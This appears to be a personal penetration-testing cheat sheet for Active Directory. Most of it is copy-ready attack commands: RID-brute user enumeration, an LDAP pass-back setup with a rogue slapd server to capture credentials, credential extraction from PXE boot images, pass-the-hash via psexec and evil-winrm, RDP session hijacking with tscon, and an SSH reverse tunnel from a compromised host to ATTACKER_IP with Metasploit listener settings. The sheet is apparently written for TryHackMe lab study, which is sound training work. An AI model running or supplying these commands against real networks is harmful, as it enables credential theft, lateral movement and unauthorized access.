Active directory

January 15, 2024

Good cheatsheet

https://wadcoms.github.io/#

Enum users

crackmapexec smb <IP> -u anonymous -p "" --rid-brute  
ldapsearch -x -b "dc=baby,dc=vl" "user"   -H ldap://baby.vl

Breaching

LDAP Pass-back Attack

Can be used then some other service uses AD LDAP and we can trick it to connect to our own malicious LDAP server instead of the target’s

install slapd

sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

reconfigure each time

Note: set domains to match targets domain!!

sudo dpkg-reconfigure -p low slapd

Create a new file with this content and save it as conf.ldif for example

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Restart service with oud new config

ldapmodify -Y EXTERNAL -H ldapi:// -f ./oldSaslSecProps.ldif && service slapd restart

Listen for our tcp traffic on port 389 to get creds

sudo tcpdump -SX -i breachad tcp port 389

Retreive credentials from PXE Boot Image

Note: this is not too common vulnerability I think

After receiving the file name of the image eg. x64{50364AB9-F5EF-4DAF-9501-1FE668B8691D}.bcd

Download it via tftp

tftp -i <IP> GET "\Tmp\x64{50364AB9-F5EF-4DAF-9501-1FE668B8691D}.bcd " conf.bcd

Read contents via powerxpe

Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile

Download the image itself

tftp -i <THMMDT IP> GET "<PXE Boot Image Location>" pxeboot.wim

Find credentials inside image

Get-FindCredentials -WimFile pxeboot.wim

Pass the hash

xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

Session hijacking

RDP

Launch powershell in admin session

PSExec64.exe -s cmd.exe

Query sessions

query user

Connect our session to another

tscon 3 /dest:rdp-tcp#6

Port forwarding

Socat

socat TCP4-LISTEN:13389,fork TCP4:THMIIS.za.tryhackme.com:3389

Pivoting via ssh

This example is from THM´s Port forwarding course, check it out!

Add port forwards

Note: Execute this on already owned victim, this connect’s back from owned victom to attacker

Create dummy user on linux

useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser

ssh tunneluser@ATTACKER_IP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N

Set metasploit options

set lhost thmjmp2.za.tryhackme.com
set ReverseListenerBindAddress 127.0.0.1
set lport 7878 
set srvhost 127.0.0.1
set srvport 6666
set rhosts 127.0.0.1
set rport 8888

LDAP enum

Anonymous enum

ldapsearch -x -b "dc=baby,dc=vl" "*"  -H ldap://baby.vl
ldapsearch -x -b "dc=baby,dc=vl" "user"   -H ldap://baby.vl